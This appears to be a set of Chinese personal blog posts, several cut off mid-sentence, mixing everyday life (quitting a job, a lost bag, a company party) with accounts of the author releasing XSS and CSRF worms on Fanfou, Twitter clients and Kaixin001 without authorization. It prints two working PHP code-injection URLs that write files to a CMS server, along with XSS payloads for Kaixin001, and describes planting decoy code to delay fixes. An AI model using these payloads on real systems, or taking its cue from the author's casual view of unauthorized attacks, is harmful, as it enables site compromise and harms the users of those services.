把新浪博客搬出来了,弄了个独立的,用http://lvwei.me访问
用的是伍德派斯写的程序,主题用的是wlsy的这个主题,感谢他,愿佛祖保佑他平安
自己也改了下css,往豆瓣的风格上靠了靠
用独立博客好处多多,控制自由,没人管得着,访客信息来源清晰,还能装逼,写诗也更有灵感
当然,最重要的原因是我花1.99英镑买了lvwei.me这个域名
花了这么多钱,不弄个博客怪可惜的
刚搭建好,可能还有很多问题
今天测试了一个蠕虫,没干什么坏事
主要在保护蠕虫上下了点功夫
而且还给出了些错误的迷惑代码,能耽误别人修复BUG
果然蠕虫过了几个小时停了后,那个BUG还在,到目前还没被修复
饭否可能也还没发现,因为他们在处理了蠕虫后,却修复了知道创宇前两天公布的一个他们的BUG
那个BUG我也发现了,但看有人公布了,我就没再用了
具体我的保护蠕虫的方法,过两天有时间写一下
关于那个BUG,我也正在联系饭否
一个朋友发来这个漏洞,说是不好利用
漏洞描述给出的例子phpinfo()简直是糊弄人的
我看了下漏洞的代码,试了下,如下方法可以利用,在魔术引号开了的情况下也可
我试出两种方式:
http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp
= fopen('xixi.php','w') and fwrite($ppp,'test') and print('111')
and ($filename_b =
stripcslashes($filename_b))}}&aid=1&job=endHTML
这种会执行两次,第二次会成功
http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp
= fopen(stripcslashes($_GET[path]),'w') and fwrite($ppp,'hello')
and print('111') and ($filename_b =
stripcslashes(null))}}&aid=1&job=endHTML&path=./../index1.php
这种只执行一次,不过自己得多写个参数
今天放在国内的twitter客户端上的蠕虫果然也还算猛。不过仅仅是发个推,关注下我,没干别的坏事,但是某些敏感的极端右派还是有很多感觉很受伤,甚至将我描绘成了共产主义的接班人,竟然认为我是公匪派来摧毁所有第三方客户端的,晕死,我又不是奥特曼,我怎么会那么强大。而且在我解释了以后,竟然有人还这么认为,再怎么说我的twitter签名也是个右派的签名啊,而且我基本只玩新浪微博,不玩推特,但还是搭建了个推特中文圈,这是多么雷锋的精神啊,唉,真是为中国的民主化进程感到担忧
twitter的安全的确做的很棒,想在那上面玩跨站基本没戏
但由于国情的原因,国内的twitter用户大多用的都是客户端,所以如果跨了这些客户端,也基本能达到twitter大中华区伪跨站的效果,于是我看了下用的最广的推特中文圈的代码,有些反射的xss,但总感觉用的会不爽,因为推特客户端种类很多,我不至于每个都去找XSS啊,于是想到了最原始的远程form提交,试了下,果然没做http
referer判断,再看下别的客户端,果然也没有限制,基本上可以搞定大部分的客户端了
很快一个思路就有了,原理很简单,技术超简单。建一个页面a.php,放个美女图片,再iframe几个
我忙了一天,结果蠕虫才传播了15分钟就被干掉了,还是在夜里三点。不过传播很猛,后来新浪微博的人还加了我的MSN,还很客气,真的是处理速度和处理态度都比开心网强多了。开心网上次删了我的很多东西
不过我知道是我做了错事,原则我还是知道的,具体攻击细节,等有时间等好好写下来,超级复杂的过程
上周二办完了辞职手续,双方协议分手,财产归公司所有,办公大楼我没要,当然,公司也没说要给。办离职手续时需要很多人签字,才发现,公司竟然还有这么多地方我没来过,还有这么多的同事我没见过。这样也好,没太多感情的牵挂。
周二晚上和一起离职的测试部的哥们共同请大家吃了顿饭。对领导的感谢,对男同事的不舍,对女同事的更不舍,对未来的纠结,全随着酒,肉,白菜,四季豆,米饭,等一起痛快吐出。那天晚上大家说的黄色笑话是有史以来最多的,也是最恶心的。
我的离去,让部门的扯淡文化,烟文化,足球文化,黄色文化,赌博文化都遭受了重创。特别是赌博文化,那可是我一手靠输钱建立的啊。不过领导应该可以欣慰了。
至于离职的原因,牵扯到很多,宇宙的起源,人性的贪婪,中国民主化进程,生命的短暂,金融危机,房产泡沫,……无所不涉。
浑浑噩噩的休息了几天,每天半个西瓜两碗饭,兴奋在长夜漫漫,白天睡的是天昏地暗。
周六出去踢了场球,大场地,牛博队对对手队,我们大胜。
周日出去踢了场球,大场地,先农坛体育场,代表原公司和央行的客户踢了一场,我们大胜,晚上还陪客户吃了
昨天包落地铁上了,手机,钱包,身份证,银行卡,工卡,内存条,烟,打火机,钥匙全丢了
发了短信,我的手机已关机,地铁站说了,几个站点都没发现,心碎,估计已经被不熟悉的陌生人保管了
报应啊,偏偏我今天包里多了个内存条,正好就今天丢了,我小的时候偷过西瓜,真的是报应啊,出来混迟早是要还的
回去折腾了下,把信用卡挂失了,其他的得等补办身份证才能办
洗澡时,暗自发誓,我要报复这个社会,这时候,发现房东失踪了好久的小乌龟跑出来了,我突然想起,我是上帝走失的爹,第八感强烈的告诉我,我的命运不该如此,于是我高高兴兴的睡觉去了
所以,一早,我们接到了我手机打来的电话,让我下午去取包
取了包,给了他200,很感谢他,还是好心人多,他说我手机没电了,回去充了一夜电,而且昨晚也太累,所以早上才给我打电话,但我还是很感谢他了
测试链接
http://www.kaixin001.com/home/?_preview=other%22;alert(/aaa/);ab=%22as
现已经被封,跟上次一样,我又恶作剧了一把,蠕虫活了几个小时,但效果没上次广泛
这个漏洞很简单,但是那个参数不是用户输的,所以别人可能没检测到
这两天在研究开心网的偷菜,想弄个自动偷菜的程序,(我当然不会是喜欢偷菜,开心网那些互动基本提不起我的兴趣,是为了小乖猫而已)忽然想起开心网互动性这么强,会不会有什么XSS或csrf漏洞什么的呢,所以我就开始试着找了
想起最近开心网新出了个转贴的组件,直觉告诉我那可能有问题,要不为什么在我想研究开心网的时候推出呢,呵呵
去看了一下,发现转贴的链接地址是以这种形式打开的onclick='javascript:showOtherUrlView('http://www.topsec.com.cn','view_5715644_3025611');',这个函数会先判断你的链接是不是开心网的,是的话直接打开,不是的话会有警告提示
直觉告诉我可以利用,要不他为什么要弄得这么麻烦呢,越麻烦越危险。思考了下,我构造了一个这样的链接http://www.kaixin001.com','');alert('test');showOtherUrlView(',然后提交了,成功了,而且没有被过滤,点了一下,果然弹出了个test的提示框,呵呵,有戏。
因为这时候打开链接的代码变成了这样onclick='javascript:showOtherUrlView('http://www.kaixin001.com','');aler
昨天是公司的年会,是我来公司后参加的第一个年会,因为我们公司是有国家政策扶持和补贴的,所以开始时要求全场起立唱国歌,主持人的开场白套用了郭德纲相声上的选段,把全场男女带入了高潮,今年的年会比往年省了很多,没有表演,没有抽奖,也不管饭,就是领导讲话和互动问答,最后还有个表彰大会
从友谊宾馆出来后就是各回各家各找各妈,我们部门得奖金的优秀员工请吃饭,其实我也想请,可惜我获提名的那个奖我没被选上,我们随便找了一家吃,喝了点酒,因为秦捷同志从小对别人喝酒有阴影,所以我没喝白的,也就喝了两瓶多的啤酒,中间还去抠了吐了,然后有事就先走了,没去参加唱歌活动了,走的时候我神志清醒,充满活力
然后去接了可爱的秦捷同志,然后就是回家,城铁的动力依然是那么强劲,车一颠一颠,我靠着栏杆也跟着一颤一颤,车厢有点热,快到要下车时,我突然感觉四肢乏力,全身发虚,两眼发黑,有点晕车的感觉,还好要到了,我赶紧低腰扶着栏杆,终于车缓慢的停了
忽然感觉脸有点疼,我一看,我正躺在站台的地上,赶紧爬了起来坐在地上,站台上已经空空的了,秦捷同志蹲在我的旁边,还有几个人站在旁边问我要不要送医